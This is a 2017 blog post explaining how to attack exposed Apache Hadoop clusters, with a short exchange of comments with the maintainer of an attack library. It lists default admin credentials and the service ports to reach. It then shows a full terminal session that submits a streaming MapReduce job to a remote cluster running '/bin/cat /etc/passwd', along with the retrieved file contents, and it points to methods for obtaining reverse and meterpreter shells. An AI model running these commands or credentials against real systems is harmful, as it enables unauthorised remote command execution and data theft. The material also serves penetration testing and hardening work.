Monday, June 5, 2017

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."

If you've ever heard of've heard of Hadoop.

NFI what i'm talking a bout? Here is a 3minute video on it:

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:


Common defaults admin/admin, cloudera/cloudera

Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, full HDFS access, run queries, etc

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.

update: The hadoop attack library is worth checking out.

Most up-to-date presentation on hadoop attack library:

There is a piece around RCE (

You'll need info found in ip:50070/conf

TLDR; find the correct open Hadoop ports and run a map reduce job against the remote hadoop server. 
You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010

Let's see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job:
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.


video of above talk from appsecEU 2015

What did I miss?  Anything to add?



Anonymous said...

Hello I'm Thomas, maintainer of the hadoop-attack-library and author of the talk you pointed.
Few stuff :
- The github has been moved from to
- Our most up-to-date presentation is here:

Cheers !

CG said...

thx! I updated the post with the updated info